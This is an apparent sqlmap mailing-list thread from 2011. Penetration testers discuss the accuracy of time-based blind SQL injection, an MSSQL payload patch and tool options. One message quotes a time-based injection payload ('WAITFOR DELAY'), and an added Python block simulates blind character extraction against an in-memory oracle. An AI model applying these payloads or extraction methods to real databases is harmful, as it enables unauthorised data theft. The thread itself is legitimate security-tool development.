[05:56:40] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 18 times
[05:56:40] [INFO] Fetched data logged to text files under 'bogonExampleData'

[*] shutting down at: 05:56:40

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
From: Miroslav S. <mir...@gm...> - 2011-01-18 00:23:20

now i am really interested as hell :))

could you please just send one proper payload (use -v 3) which uses this vector?

"i want to know"

On Tue, Jan 18, 2011 at 1:02 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi Steve.
>
> Thank you for your patch but I am not sure from SQL's perspective how
> this could work?
>
> So, basically, you are proposing time based sql injection payload (e.g.):
>
> IF(1=1) WAITFOR DELAY '0:0:1'
>
> and to be honest, I am not sure in which form, other than "stacked"
> this could fit in??
>
> KR
>
> On Tue, Jan 18, 2011 at 12:42 AM, Steve Pinkham <ste...@gm...> wrote:
>> Highly based on the "Microsoft SQL Server/Sybase stacked queries" test,
>> which was throwing unrelated 500 errors on the ASP application I was
>> testing due to the semicolons. This worked for data extraction for me.
>>
>> Not sure if one or the other of them should be moved to a higher level
>> to limit testing time in the general case? Anyone have more experience
>> with which one would be more useful?
>>
>> svn diff based on revision 3014.
>>
>> Patch licensed under GPLv2 to match the project license, if the patch is
>> used. I assume that's the normal procedure for this project?
>> --
>> | Steven Pinkham, Security Consultant |
>> | http://www.mavensecurity.com |
>> | GPG public key ID CD31CAFB |
>
> --
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-01-18 00:02:59

Hi Steve.

Thank you for your patch but I am not sure from SQL's perspective how this could work?

So, basically, you are proposing time based sql injection payload (e.g.):

IF(1=1) WAITFOR DELAY '0:0:1'

and to be honest, I am not sure in which form, other than "stacked" this could fit in??

KR

On Tue, Jan 18, 2011 at 12:42 AM, Steve Pinkham <ste...@gm...> wrote:
> Highly based on the "Microsoft SQL Server/Sybase stacked queries" test,
> which was throwing unrelated 500 errors on the ASP application I was
> testing due to the semicolons. This worked for data extraction for me.
>
> Not sure if one or the other of them should be moved to a higher level
> to limit testing time in the general case? Anyone have more experience
> with which one would be more useful?
>
> svn diff based on revision 3014.
>
> Patch licensed under GPLv2 to match the project license, if the patch is
> used. I assume that's the normal procedure for this project?
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Steve P. <ste...@gm...> - 2011-01-17 23:43:12

Highly based on the "Microsoft SQL Server/Sybase stacked queries" test, which was throwing unrelated 500 errors on the ASP application I was testing due to the semicolons. This worked for data extraction for me.

Not sure if one or the other of them should be moved to a higher level to limit testing time in the general case? Anyone have more experience with which one would be more useful?

svn diff based on revision 3014.

Patch licensed under GPLv2 to match the project license, if the patch is used. I assume that's the normal procedure for this project?

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
From: Miroslav S. <mir...@gm...> - 2011-01-17 23:34:41

...but still, I must say that this is a quite good idea:

"One way to increase the quality with little speed overhead would be an option to verify the character result of the blind binary search using an equals query and restarting just that character if the answer is not correct."

and we'll try to implement it.

kr

On Tue, Jan 18, 2011 at 12:31 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi Steve.
>
> We can consider some mechanisms to improve it, but first of all keep it real.
>
> We are talking about a most delicate sql injection technique which is
> highly prone to "outside entropy". Its precision is directly
> inversely proportional to the time needed to retrieve all data, and
> nobody wants to wait for some "useful" data "too long".
>
> So, IMHO, I am aware that here and there some character can go wrong
> (either caused by line used or some change of the web server's load)
> but still info retrieved is prone to personal filtration (in this case
> everybody is aware that that 'A' there is a junk character).
>
> KR
>
> On Tue, Jan 18, 2011 at 12:17 AM, Steve Pinkham <ste...@gm...> wrote:
>> First off, I'm loving the newest versions of sqlmap. It's even better
>> than ever, and by far my favourite tool in the space.
>>
>> Now that time-based injection is better supported, one of the side
>> effects is that the quality of results has gone down for me. For
>> example on a site I'm testing, the banner results are:
>>
>> Microsoft SQL Seryer 2008 (RTM) - 10.0A1600.22 (X64)
>> Where it should probably be
>> Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64)
>>
>> And this is with a 20 second delay!
>>
>> One way to increase the quality with little speed overhead would be an
>> option to verify the character result of the blind binary search using
>> an equals query and restarting just that character if the answer is not
>> correct.
>>
>> This should only add one request per character, and be much more time
>> efficient than using a longer delay, using a safe url in between every
>> request, or other mitigations that would increase the result quality at
>> higher cost.
>>
>> Any thoughts?
>> --
>> | Steven Pinkham, Security Consultant |
>> | http://www.mavensecurity.com |
>> | GPG public key ID CD31CAFB |
>>
>
> --
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-01-17 23:31:43

Hi Steve.

We can consider some mechanisms to improve it, but first of all keep it real.

We are talking about a most delicate sql injection technique which is highly prone to "outside entropy". Its precision is directly inversely proportional to the time needed to retrieve all data, and nobody wants to wait for some "useful" data "too long".

So, IMHO, I am aware that here and there some character can go wrong (either caused by line used or some change of the web server's load) but still info retrieved is prone to personal filtration (in this case everybody is aware that that 'A' there is a junk character).

KR

On Tue, Jan 18, 2011 at 12:17 AM, Steve Pinkham <ste...@gm...> wrote:
> First off, I'm loving the newest versions of sqlmap. It's even better
> than ever, and by far my favourite tool in the space.
>
> Now that time-based injection is better supported, one of the side
> effects is that the quality of results has gone down for me. For
> example on a site I'm testing, the banner results are:
>
> Microsoft SQL Seryer 2008 (RTM) - 10.0A1600.22 (X64)
> Where it should probably be
> Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64)
>
> And this is with a 20 second delay!
>
> One way to increase the quality with little speed overhead would be an
> option to verify the character result of the blind binary search using
> an equals query and restarting just that character if the answer is not
> correct.
>
> This should only add one request per character, and be much more time
> efficient than using a longer delay, using a safe url in between every
> request, or other mitigations that would increase the result quality at
> higher cost.
>
> Any thoughts?
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |
>

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Steve P. <ste...@gm...> - 2011-01-17 23:17:21

First off, I'm loving the newest versions of sqlmap. It's even better than ever, and by far my favourite tool in the space.

Now that time-based injection is better supported, one of the side effects is that the quality of results has gone down for me. For example on a site I'm testing, the banner results are:

Microsoft SQL Seryer 2008 (RTM) - 10.0A1600.22 (X64)

Where it should probably be

Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64)

And this is with a 20 second delay!

One way to increase the quality with little speed overhead would be an option to verify the character result of the blind binary search using an equals query and restarting just that character if the answer is not correct.

This should only add one request per character, and be much more time efficient than using a longer delay, using a safe url in between every request, or other mitigations that would increase the result quality at higher cost.

Any thoughts?

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |
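An added illustration of the trade-off discussed in this message and in Miroslav's replies above (example code written for this page, not sqlmap code and not anything Steve or Miroslav posted): a Python model of the blind character-by-character binary search run against an in-memory oracle whose yes/no answers can be flipped at chosen request numbers, comparing the plain search with Steve's proposed one-request equality check. The secret value, the NoisyOracle class and the flipped-answer positions are constructed for the example.

```python
# Constructed stand-in for the target: an in-memory value plus an oracle that
# answers the two yes/no questions a blind inference would ask. The oracle is
# unreliable in a reproducible way: every answer whose sequence number is in
# `flipped` comes back wrong (a delay lost to server load), which models the
# "outside entropy" the thread is about.
SECRET = "SQL"   # constructed sample value


class NoisyOracle:
    def __init__(self, secret, flipped=()):
        self.secret, self.flipped, self.requests = secret, set(flipped), 0

    def _ask(self, truth):
        self.requests += 1
        return (not truth) if self.requests in self.flipped else truth

    def greater_than(self, pos, value):   # "is ASCII(char at pos) > value?"
        return self._ask(ord(self.secret[pos]) > value)

    def equals(self, pos, value):         # "is ASCII(char at pos) = value?"
        return self._ask(ord(self.secret[pos]) == value)


def search_char(oracle, pos):
    """Seven-step binary search over the 7-bit ASCII range: a single wrong
    answer sends the search into the wrong half and yields a junk character."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.greater_than(pos, mid):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def retrieve(oracle, length, verify=False, max_retries=3):
    """Return (value, requests). With verify=True each character costs one
    extra equality request and only that character is searched again when
    the check fails; after max_retries the last result is kept unverified."""
    out = []
    for pos in range(length):
        ch = search_char(oracle, pos)
        if verify:
            for _ in range(max_retries):
                if oracle.equals(pos, ord(ch)):
                    break
                ch = search_char(oracle, pos)   # restart just this character
        out.append(ch)
    return "".join(out), oracle.requests
```

With the very first answer flipped, the plain search returns '?QL' for the price of 21 requests, while the verified search returns 'SQL' for 32: one extra request per character plus a full re-search of only the character that failed its check.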
From: Miroslav S. <mir...@gm...> - 2011-01-17 22:47:24

Hi Antonios.

You probably want to use switch --batch:

"--batch    Never ask for user input, use the default behaviour"

KR

On Mon, Jan 17, 2011 at 10:36 PM, Antonios Atlasis <ant...@gm...> wrote:
>
> Hello to the list.
>
> while trying to parse targets from webscarab logs, I'd like to ask you if
> there is an option to automatically answer "Yes" to sqlmap questions to test
> the several URLs.
>
> Thanks in advance
>
> Antonios
>

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Antonios A. <ant...@gm...> - 2011-01-17 21:36:47

Hello to the list.

While trying to parse targets from webscarab logs, I'd like to ask you if there is an option to automatically answer "Yes" to sqlmap questions to test the several URLs.

Thanks in advance

Antonios
From: Miroslav S. <mir...@gm...> - 2011-01-17 14:52:09

Hi all.

I have a general question to all those pentesters that are retrieving data from sites with "funny" charset encodings (...russian, chinese...).

What should be the general "consensus" for data retrieval:

A) assume that the backend DBMS uses the "utf8" charset encoding
or
B) treat data retrieved with the same encoding as used in the page
or
C) find out the proper collation used and use that one? (i am not a fan of this one :)
or
D) don't care (some people tend to use mixed collations which is quite romantic)

Also, I would like to ask you all to try out the latest revision with cases that could be problematic and report impressions.

Kind regards
From: <bu...@gm...> - 2011-01-17 00:30:49

On 01/17/2011 12:25 AM, Miroslav Stampar wrote:
> hi buawig.
>
> we've done some heavy development in other parts and haven't updated
> --sql-shell accordingly. i can only say that we'll try to do our best and
> update it in couple of weeks (not a trivial one as now it's only supported
> by the part of sqlmap with blind based injections).

OK. Thank you for your fast reply and committing r3004.